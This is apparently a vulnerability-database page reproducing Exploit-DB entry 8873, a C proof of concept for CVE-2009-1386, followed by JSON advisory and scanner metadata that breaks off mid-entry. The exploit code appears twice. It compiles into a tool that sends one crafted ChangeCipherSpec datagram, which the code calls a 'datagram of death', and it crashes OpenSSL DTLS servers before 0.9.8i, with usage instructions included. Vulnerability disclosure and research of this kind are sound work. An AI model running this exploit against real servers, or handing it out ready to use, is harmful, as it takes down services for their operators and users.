OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit
2009-06-04T00:00:00
ID EDB-ID:8873 Type exploitdb Reporter Jon Oberheide Modified 2009-06-04T00:00:00
Description
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit. CVE-2009-1386. Dos exploits for multiple platform
/*
* cve-2009-1386.c
*
* OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386
*
* OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as
* the first record instead of ClientHello.
*
* Usage:
*
* Pass the host and port of the target DTLS server:
*
* $ gcc cve-2009-1386.c -o cve-2009-1386
* $ ./cve-2009-1386 1.2.3.4 666
*
* Notes:
*
* Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this
* only requires a single ChangeCipherSpec datagram, but affects an older
* version of OpenSSL.
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
int
main(int argc, char **argv)
{
int sock, ret;
char *ptr, *err;
struct hostent *h;
struct sockaddr_in target;
char buf[64];
if (argc < 3) {
err = "Pass the host and port of the target DTLS server";
printf("[-] Error: %s\n", err);
exit(1);
}
h = gethostbyname(argv[1]);
if (!h) {
err = "Unknown host specified";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
exit(1);
}
target.sin_family = h->h_addrtype;
memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
target.sin_port = htons(atoi(argv[2]));
sock = socket(AF_INET, SOCK_DGRAM, 0);
if (sock == -1) {
err = "Failed creating UDP socket";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
exit(1);
}
ret = connect(sock, (struct sockaddr *) &target, sizeof(target));
if (ret == -1) {
err = "Failed to connect socket";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
exit(1);
}
memcpy(buf, "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01", 14);
printf("[+] Sending DTLS datagram of death at %s:%s...\n", argv[1], argv[2]);
send(sock, buf, 14, 0);
close(sock);
return 0;
}
// milw0rm.com [2009-06-04]
{"hash": "e7aeb5a04dde53dea1b7d958ef45498ba4a3421d5b19303532797528d2b673ee", "id": "EDB-ID:8873", "lastseen": "2016-02-01T09:21:51", "viewCount": 6, "bulletinFamily": "exploit", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/", "score": 5.0}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 5.0}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/8873/", "description": "OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit. CVE-2009-1386. Dos exploits for multiple platform", "title": "OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit", "sourceData": "/*\n * cve-2009-1386.c\n *\n * OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n *\n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386\n *\n * OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as\n * the first record instead of ClientHello.\n *\n * Usage:\n *\n * Pass the host and port of the target DTLS server:\n *\n * $ gcc cve-2009-1386.c -o cve-2009-1386\n * $ ./cve-2009-1386 1.2.3.4 666\n *\n * Notes:\n *\n * Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this \n * only requires a single ChangeCipherSpec datagram, but affects an older \n * version of OpenSSL.\n *\n */\n\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <errno.h>\n#include <netdb.h>\n#include <netinet/in.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/socket.h>\n\nint\nmain(int argc, char **argv)\n{\n\tint sock, ret;\n\tchar *ptr, *err;\n\tstruct hostent *h;\n\tstruct sockaddr_in target;\n\tchar buf[64];\n\n\tif (argc < 3) {\n\t\terr = \"Pass the host and port of the target DTLS server\";\n\t\tprintf(\"[-] Error: %s\\n\", err);\n\t\texit(1);\n\t}\n\n\th = gethostbyname(argv[1]);\n\tif (!h) {\n\t\terr = \"Unknown host specified\";\n\t\tprintf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\n\t\texit(1);\n\t}\n\n\ttarget.sin_family = h->h_addrtype;\n\tmemcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length);\n\ttarget.sin_port = htons(atoi(argv[2]));\n\n\tsock = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sock == -1) {\n\t\terr = \"Failed creating UDP socket\";\n\t\tprintf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\n\t\texit(1);\n\t}\n\n\tret = connect(sock, (struct sockaddr *) &target, sizeof(target));\n\tif (ret == -1) {\n\t\terr = \"Failed to connect socket\";\n\t\tprintf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\n\t\texit(1);\n\t}\n\n\tmemcpy(buf, \"\\x14\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\", 14);\n\n\tprintf(\"[+] Sending DTLS datagram of death at %s:%s...\\n\", argv[1], argv[2]);\n\n\tsend(sock, buf, 14, 0);\n\n\tclose(sock);\n\n\treturn 0;\n}\n\n// milw0rm.com [2009-06-04]\n", "objectVersion": "1.0", "cvelist": ["CVE-2009-1386"], "published": "2009-06-04T00:00:00", "osvdbidlist": ["55073"], "references": [], "reporter": "Jon Oberheide", "modified": "2009-06-04T00:00:00", "href": "https://www.exploit-db.com/exploits/8873/"}
{"result": {"cve": [{"id": "CVE-2009-1386", "type": "cve", "title": "CVE-2009-1386", "description": "ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello.", "published": "2009-06-04T12:30:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1386", "cvelist": ["CVE-2009-1386"], "lastseen": "2017-09-29T14:26:35"}], "openssl": [{"id": "OPENSSL:CVE-2009-1386", "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2009-1386)", "description": "Fix a NULL pointer dereference if a DTLS server recieved ChangeCipherSpec as first record. A remote attacker could use this flaw to cause a DTLS server to crash Reported by Alex Lam.", "published": "2009-06-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.openssl.org/news/vulnerabilities.html", "cvelist": ["CVE-2009-1386"], "lastseen": "2016-09-26T17:22:35"}], "f5": [{"id": "SOL15351", "type": "f5", "title": "SOL15351 - OpenSSL DTLS ChangeCipherSpec vulnerability CVE-2009-1386", "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "published": "2014-06-19T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15351.html", "cvelist": ["CVE-2009-1386"], "lastseen": "2016-09-26T17:23:13"}], "openvas": [{"id": "OPENVAS:1361412562310800809", "type": "openvas", "title": "Denial Of Service Vulnerability in OpenSSL June-09 (Linux)", "description": "This host has OpenSSL installed and is prone to Denial of Service\n vulnerability.", "published": "2009-06-12T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800809", "cvelist": ["CVE-2009-1386"], "lastseen": "2017-07-02T21:14:16"}, {"id": "OPENVAS:136141256231065894", "type": "openvas", "title": "SLES10: Security update for OpenSSL", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "published": "2009-10-13T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065894", "cvelist": ["CVE-2009-1386", "CVE-2009-1387"], "lastseen": "2018-04-06T11:40:11"}, {"id": "OPENVAS:136141256231065675", "type": "openvas", "title": "SLES11: Security update for OpenSSL", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libopenssl0_9_8\n openssl\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "published": "2009-10-11T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065675", "cvelist": ["CVE-2009-1386", "CVE-2009-1387"], "lastseen": "2018-04-06T11:37:10"}, {"id": "OPENVAS:65675", "type": "openvas", "title": "SLES11: Security update for OpenSSL", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libopenssl0_9_8\n openssl\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "published": "2009-10-11T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=65675", "cvelist": ["CVE-2009-1386", "CVE-2009-1387"], "lastseen": "2017-07-26T08:55:10"}, {"id": "OPENVAS:65894", "type": "openvas", "title": "SLES10: Security update for OpenSSL", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "published": "2009-10-13T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=65894", "cvelist": ["CVE-2009-1386", "CVE-2009-1387"], "lastseen": "2017-07-26T08:56:11"}, {"id": "OPENVAS:136141256231064947", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:237 (openssl)", "description": "The remote host is missing an update to openssl\nannounced via advisory MDVSA-2009:237.", "published": "2009-09-28T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064947", "cvelist": ["CVE-2009-1386", "CVE-2009-2409"], "lastseen": "2018-04-06T11:38:51"}, {"id": "OPENVAS:64947", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:237 (openssl)", "description": "The remote host is missing an update to openssl\nannounced via advisory MDVSA-2009:237.", "published": "2009-09-28T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64947", "cvelist": ["CVE-2009-1386", "CVE-2009-2409"], "lastseen": "2017-07-24T12:56:38"}, {"id": "OPENVAS:136141256231064948", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:238 (openssl)", "description": "The remote host is missing an update to openssl\nannounced via advisory MDVSA-2009:238.", "published": "2009-09-28T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064948", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-2409", "CVE-2009-1387"], "lastseen": "2018-04-06T11:40:21"}, {"id": "OPENVAS:64948", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:238 (openssl)", "description": "The remote host is missing an update to openssl\nannounced via advisory MDVSA-2009:238.", "published": "2009-09-28T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64948", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-2409", "CVE-2009-1387"], "lastseen": "2017-07-24T12:57:08"}, {"id": "OPENVAS:136141256231064799", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1335", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1335.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a full-strength\ngeneral purpose cryptography library. Datagram TLS (DTLS) is a protocol\nbased on TLS that is capable of securing datagram transport (for example,\nUDP).\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS\nimplementation. A remote attacker could use these flaws to cause a DTLS\nserver to use excessive amounts of memory, or crash on an invalid memory\naccess or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use DTLS. Red Hat does not\nship any DTLS client or server applications in Red Hat Enterprise Linux.\n\nAn input validation flaw was found in the handling of the BMPString and\nUniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex()\nfunction. An attacker could use this flaw to create a specially-crafted\nX.509 certificate that could cause applications using the affected function\nto crash when printing certificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped with Red\nHat Enterprise Linux calls this function, for example.", "published": "2009-09-09T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064799", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "lastseen": "2018-04-06T11:38:06"}], "seebug": [{"id": "SSV:11541", "type": "seebug", "title": "OpenSSL ChangeCipherSpec DTLS\u62a5\u6587\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "description": "BUGTRAQ ID: 35174\r\nCVE(CAN) ID: CVE-2009-1386\r\n\r\nOpenSSL\u662f\u4e00\u79cd\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\uff0c\u73b0\u5728\u88ab\u5e7f\u6cdb\u5730\u7528\u4e8e\u5404\u79cd\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u4e2d\u3002\r\n\r\n\u5982\u679c\u5728ClientHello\u62a5\u6587\u4e4b\u524d\u53d1\u9001\u4e86DTLS ChangeCipherSpec\u62a5\u6587\uff0c\u5c31\u53ef\u80fd\u5728OpenSSL\u7684ssl/s3_pkt.c\u6587\u4ef6\u4e2d\u89e6\u53d1\u7a7a\u6307\u9488\u5f15\u7528\uff0c\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u7684\u60c5\u51b5\u3002\r\n\n\nOpenSSL 0.9.8i\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOpenSSL Project\r\n---------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://cvs.openssl.org/chngview?cn=17369\" target=\"_blank\" rel=external nofollow>http://cvs.openssl.org/chngview?cn=17369</a>", "published": "2009-06-06T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-11541", "cvelist": ["CVE-2009-1386"], "lastseen": "2017-11-19T18:48:18"}, {"id": "SSV:66601", "type": "seebug", "title": "OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-66601", "cvelist": ["CVE-2009-1378", "CVE-2009-1386"], "lastseen": "2017-11-19T13:55:14"}, {"id": "SSV:11530", "type": "seebug", "title": "OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit", "description": "No description provided by source.", "published": "2009-06-05T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-11530", "cvelist": ["CVE-2009-1378", "CVE-2009-1386"], "lastseen": "2017-11-19T18:48:26"}], "metasploit": [{"id": "MSF:AUXILIARY/DOS/SSL/DTLS_CHANGECIPHERSPEC", "type": "metasploit", "title": "OpenSSL DTLS ChangeCipherSpec Remote DoS", "description": "This module performs a Denial of Service Attack against Datagram TLS in OpenSSL version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a ChangeCipherspec Datagram before a ClientHello.", "published": "2011-05-04T19:08:28", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2009-1386"], "lastseen": "2018-02-04T08:21:35"}], "nessus": [{"id": "OPENSSL_0_9_8I.NASL", "type": "nessus", "title": "OpenSSL < 0.9.8i Denial of Service", "description": "According to its banner, the remote server is running a version of OpenSSL that is earlier than 0.9.8i. \n\nA remote attacker can crash the server by sending a DTLS ChangeCipherSpec packet before the ClientHello.", "published": "2012-01-04T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=17761", "cvelist": ["CVE-2009-1386"], "lastseen": "2017-10-29T13:40:28"}, {"id": "SUSE_LIBOPENSSL-DEVEL-6291.NASL", "type": "nessus", "title": "openSUSE 10 Security Update : libopenssl-devel (libopenssl-devel-6291)", "description": "OpenSSL DTLS remote DoS in ChangeCipherSpec (CVE-2009-1386) and in out-of-sequence message handling (CVE-2009-1387) have been fixed.", "published": "2009-06-18T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39445", "cvelist": ["CVE-2009-1386", "CVE-2009-1387"], "lastseen": "2017-10-29T13:36:00"}, {"id": "SUSE_OPENSSL-6296.NASL", "type": "nessus", "title": "SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 6296)", "description": "OpenSSL DTLS remote DoS in ChangeCipherSpec (CVE-2009-1386) and in out-of-sequence message handling (CVE-2009-1387) have been fixed.", "published": "2009-09-24T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=41573", "cvelist": ["CVE-2009-1386", "CVE-2009-1387"], "lastseen": "2017-10-29T13:32:46"}, {"id": "SUSE_11_1_LIBOPENSSL-DEVEL-090609.NASL", "type": "nessus", "title": "openSUSE Security Update : libopenssl-devel (libopenssl-devel-974)", "description": "OpenSSL DTLS remote DoS in ChangeCipherSpec (CVE-2009-1386) and in out-of-sequence message handling (CVE-2009-1387) have been fixed.", "published": "2009-07-21T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=40262", "cvelist": ["CVE-2009-1386", "CVE-2009-1387"], "lastseen": "2017-10-29T13:36:34"}, {"id": "SUSE_11_0_LIBOPENSSL-DEVEL-090609.NASL", "type": "nessus", "title": "openSUSE Security Update : libopenssl-devel (libopenssl-devel-974)", "description": "OpenSSL DTLS remote DoS in ChangeCipherSpec (CVE-2009-1386) and in out-of-sequence message handling (CVE-2009-1387) have been fixed.", "published": "2009-07-21T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=40035", "cvelist": ["CVE-2009-1386", "CVE-2009-1387"], "lastseen": "2017-10-29T13:43:27"}, {"id": "SUSE_11_OPENSSL-090610.NASL", "type": "nessus", "title": "SuSE 11 Security Update : OpenSSL (SAT Patch Number 990)", "description": "OpenSSL DTLS remote DoS in ChangeCipherSpec (CVE-2009-1386) and in out-of-sequence message handling (CVE-2009-1387) have been fixed.", "published": "2009-09-24T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=41443", "cvelist": ["CVE-2009-1386", "CVE-2009-1387"], "lastseen": "2017-10-29T13:45:43"}, {"id": "UBUNTU_USN-792-1.NASL", "type": "nessus", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 : openssl vulnerabilities (USN-792-1)", "description": "It was discovered that OpenSSL did not limit the number of DTLS records it would buffer when they arrived with a future epoch. A remote attacker could cause a denial of service via memory resource consumption by sending a large number of crafted requests.\n(CVE-2009-1377)\n\nIt was discovered that OpenSSL did not properly free memory when processing DTLS fragments. A remote attacker could cause a denial of service via memory resource consumption by sending a large number of crafted requests. (CVE-2009-1378)\n\nIt was discovered that OpenSSL did not properly handle certain server certificates when processing DTLS packets. A remote DTLS server could cause a denial of service by sending a message containing a specially crafted server certificate. (CVE-2009-1379)\n\nIt was discovered that OpenSSL did not properly handle a DTLS ChangeCipherSpec packet when it occured before ClientHello. A remote attacker could cause a denial of service by sending a specially crafted request. (CVE-2009-1386)\n\nIt was discovered that OpenSSL did not properly handle out of sequence DTLS handshake messages. A remote attacker could cause a denial of service by sending a specially crafted request. (CVE-2009-1387).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2009-06-26T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39534", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378"], "lastseen": "2017-10-29T13:41:59"}, {"id": "MANDRIVA_MDVSA-2009-238.NASL", "type": "nessus", "title": "Mandriva Linux Security Advisory : openssl (MDVSA-2009:238)", "description": "Multiple vulnerabilities was discovered and corrected in openssl :\n\nUse-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate (CVE-2009-1379).\n\nssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello (CVE-2009-1386).\n\nThe dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a fragment bug.\n(CVE-2009-1387)\n\nThe NSS library library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spooof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time. NOTE: the scope of this issue is currently limited because the amount of computation required is still large (CVE-2009-2409).\n\nThis update provides a solution to these vulnerabilities.", "published": "2009-09-22T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=41030", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-2409", "CVE-2009-1387"], "lastseen": "2017-10-29T13:33:01"}, {"id": "SL_20090902_OPENSSL_ON_SL5_X.NASL", "type": "nessus", "title": "Scientific Linux Security Update : openssl on SL5.x i386/x86_64", "description": "CVE-2009-0590 openssl: ASN1 printing crash\n\nCVE-2009-1377 OpenSSL: DTLS epoch record buffer memory DoS\n\nCVE-2009-1378 OpenSSL: DTLS fragment handling memory DoS\n\nCVE-2009-1379 OpenSSL: DTLS pointer use-after-free flaw (DoS)\n\nCVE-2009-1386 openssl: DTLS NULL deref crash on early ChangeCipherSpec request\n\nCVE-2009-1387 openssl: DTLS out-of-sequence message handling NULL deref DoS\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS implementation. A remote attacker could use these flaws to cause a DTLS server to use excessive amounts of memory, or crash on an invalid memory access or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\n\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use DTLS. Scientific Linux does not ship any DTLS client or server applications.\n\nAn input validation flaw was found in the handling of the BMPString and UniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex() function. An attacker could use this flaw to create a specially crafted X.509 certificate that could cause applications using the affected function to crash when printing certificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped with Scientific Linux calls this function, for example.\n\nThese updated packages also fix the following bugs :\n\n - 'openssl smime -verify -in' verifies the signature of the input file and the '-verify' switch expects a signed or encrypted input file. Previously, running openssl on an S/MIME file that was not encrypted or signed caused openssl to segfault. With this update, the input file is now checked for a signature or encryption. Consequently, openssl now returns an error and quits when attempting to verify an unencrypted or unsigned S/MIME file.\n (BZ#472440)\n\n - when generating RSA keys, pairwise tests were called even in non-FIPS mode. This prevented small keys from being generated. With this update, generating keys in non-FIPS mode no longer calls the pairwise tests and keys as small as 32-bits can be generated in this mode.\n Note: In FIPS mode, pairwise tests are still called and keys generated in this mode must still be 1024-bits or larger. (BZ#479817)\n\nAs well, these updated packages add the following enhancements :\n\n - both the libcrypto and libssl shared libraries, which are part of the OpenSSL FIPS module, are now checked for integrity on initialization of FIPS mode. (BZ#475798)\n\n - an issuing Certificate Authority (CA) allows multiple certificate templates to inherit the CA's Common Name (CN). Because this CN is used as a unique identifier, each template had to have its own Certificate Revocation List (CRL). With this update, multiple CRLs with the same subject name can now be stored in a X509_STORE structure, with their signature field being used to distinguish between them. (BZ#457134)\n\n - the fipscheck library is no longer needed for rebuilding the openssl source RPM. (BZ#475798)", "published": "2012-08-01T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=60658", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "lastseen": "2017-10-29T13:43:06"}, {"id": "MANDRIVA_MDVSA-2009-310.NASL", "type": "nessus", "title": "Mandriva Linux Security Advisory : openssl (MDVSA-2009:310)", "description": "Multiple security vulnerabilities has been identified and fixed in OpenSSL :\n\nThe dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of future epoch DTLS records that are buffered in a queue, aka DTLS record buffer limitation bug. (CVE-2009-1377)\n\nMultiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka DTLS fragment handling memory leak. (CVE-2009-1378)\n\nUse-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate (CVE-2009-1379).\n\nssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello (CVE-2009-1386).\n\nThe dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a 